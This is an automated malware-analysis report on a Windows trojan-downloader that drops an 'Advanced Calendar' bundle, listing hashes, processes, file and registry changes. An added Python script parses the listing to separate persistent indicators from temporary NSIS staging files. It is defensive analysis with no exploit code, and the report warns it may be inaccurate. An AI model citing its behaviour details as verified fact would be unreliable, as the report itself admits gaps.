Gen.Variant.Zusy.178812_5ef2c67ca0

by malwarelabrobot on May 4th, 2016 in Malware Descriptions.

Trojan-Downloader.Win32.Agent.wtkzi (Kaspersky), Gen:Variant.Zusy.178812 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 5ef2c67ca0d12eac12e1f3db9dd7ddc3
SHA1: c53635e5603d37eb8c95b2027ab52a4e068391b3
SHA256: 1d7fc913b8190e48f0f38f5844cbcd5455f7ea251d447b0d2238b4648c653492
SSDeep: 24576:V6Yi atnhL9tsEyi xhtPl NcsJupQqku14w4:of gnhL9NyX4qsupn4
Size: 955891 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-27 07:38:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712

The Trojan injects its code into the following process(es):

Calendar.exe:3428

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process imapi.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)

The process InstallHelper.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)

The process InstallHelper.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process nst6.tmp.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3156 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6 (0 bytes)

The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)

The process setup.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)

The process Calendar.exe:3428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (340 bytes)

The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
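A note on reading the listing above, followed by an added triage helper (editor's example; it is not part of the Lavasoft report). The nsd2.tmp and nsd5.tmp directories under Temp, the INetC.dll, nsExec.dll and System.dll files written into them, and the nst6.tmp.exe child stub are the staging pattern of an NSIS installer: NSIS unpacks its plugin DLLs into a Temp\ns<letter><digit>.tmp directory and removes them on exit, INetC is the NSIS Internet download plugin (consistent with the Trojan-Downloader classification), nsExec is its process-launch plugin and System.dll its Win32 call plugin. Everything in those directories is created and deleted within the run, so on a live host the durable indicators are the %Program Files%\CalendarTool\2.0.0.11189 tree and the CalendarTool\dump\BugReportConfig.ini files under Application Data, not the Temp staging. Note also that imapi.exe:1932 is the Windows XP IMAPI CD-Burning COM Service process, so its %WinDir%\Temp\*.TMP write is service activity rather than a dropped payload. The script below parses a constructed excerpt of the listing in the report's own format, separates files that persist from files that were only staged, and flags the NSIS artifacts. The mapping of the report's placeholders to real paths is an assumption based on English Windows XP defaults (the analysis platform stated above); the user name is left symbolic.

```python
"""Triage the file-activity listing of a sandbox report (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own format, abridged from the listing above.
SAMPLE_REPORT = r"""
The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)

The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
"""

PROC_RE = re.compile(r"^The process (.+?) makes changes in the file system\.$")
FILE_RE = re.compile(r"^(.+) \((\d+) bytes\)$")
# NSIS unpacks plugin DLLs into %TEMP%\ns<letter><digit>.tmp\ and writes child
# installers as ns<letter><digit>.tmp.exe; both are removed when the installer exits.
NSIS_STAGING_RE = re.compile(r"\\Temp\\ns[a-z]?\d+\.tmp(\\|\.exe$)", re.IGNORECASE)
NSIS_PLUGINS = {"inetc.dll", "nsexec.dll", "system.dll"}  # download, exec, Win32-call plugins
# Assumed English Windows XP defaults for the report's placeholders; <user> stays symbolic.
PLACEHOLDERS = {
    "%Documents and Settings%": r"C:\Documents and Settings",
    "%current user%": "<user>",
    "%Program Files%": r"C:\Program Files",
    "%WinDir%": r"C:\WINDOWS",
}


@dataclass
class Activity:
    created: dict[str, int] = field(default_factory=dict)  # path -> size in bytes
    deleted: set[str] = field(default_factory=set)


def parse_file_activity(text: str) -> dict[str, Activity]:
    """Group created and deleted paths by the process the report attributes them to."""
    procs: dict[str, Activity] = {}
    current, mode = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := PROC_RE.match(line):
            current, mode = procs.setdefault(m.group(1), Activity()), None
        elif line.startswith("The Trojan creates"):
            mode = "create"
        elif line.startswith("The Trojan deletes"):
            mode = "delete"
        elif (m := FILE_RE.match(line)) and current is not None and mode is not None:
            if mode == "create":
                current.created[m.group(1)] = int(m.group(2))
            else:
                current.deleted.add(m.group(1))
    return procs


def resolve(path: str) -> str:
    """Map the report's placeholder path to the on-disk path a responder would check."""
    for token, real in PLACEHOLDERS.items():
        path = path.replace(token, real)
    return path


def is_nsis_artifact(path: str) -> bool:
    """True for NSIS plugin-directory contents, plugin DLL names and ns*.tmp.exe stubs."""
    return bool(NSIS_STAGING_RE.search(path)) or path.rsplit("\\", 1)[-1].lower() in NSIS_PLUGINS


def triage(procs: dict[str, Activity]) -> dict[str, list[str]]:
    """Split written paths into persisted vs. staged-then-deleted; flag NSIS staging."""
    created: dict[str, int] = {}
    deleted: set[str] = set()
    for act in procs.values():
        created.update(act.created)
        deleted |= act.deleted
    return {
        "persisted": sorted(p for p in created if p not in deleted),
        "staged": sorted(p for p in created if p in deleted),
        "nsis_artifacts": sorted(p for p in created if is_nsis_artifact(p)),
    }


if __name__ == "__main__":
    for bucket, paths in triage(parse_file_activity(SAMPLE_REPORT)).items():
        print(bucket, *[resolve(p) for p in paths], sep="\n  ")
```

Run against the full listing, the persisted bucket is the host-check list and the staged bucket explains why a Temp search on a live machine will come back empty.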

Registry activity

The process imapi.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 D1 1C CB 70 45 7A A0 D0 0B 82 18 85 7F 8C 74"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"ControlFlags" = "1"
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"BitNames" = " ImapiDebugError ImapiDebugWarning ImapiDebugTrace ImapiDebugInfo ImapiDebugX ImapiDebugSort"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"Guid" = "8107d8e9-e323-49f5-bba2-abc35c243dca"

The process InstallHelper.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Control\TimeZoneInformation]
"ActiveTimeBias" = "4294967176"

[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\CalendarTool\INSTALL_MARK]
"Version" = "2.0.0.11189"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"PartnerId" = "YeaPlayer|br|IBD|Bundle"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayIcon" = "%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"INSTALL_FIRST_TIME" = "2016-05-03_04:55:47"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayFullVersion" = "2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\CalendarTool]
"FrID" = "ClwS01UkXONz6DdlNQFq0y97Bu1dKUCqMKc="

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayVersion" = "2.0.0.11189"
"Publisher" = "MEIXIAN XIE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayName" = "Advanced Calendar 2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"parentName" = "setup.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level"

The process InstallHelper.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 51 D7 E3 70 D0 78 6F A0 B2 1E 2B 0F 84 47 49"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process nst6.tmp.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

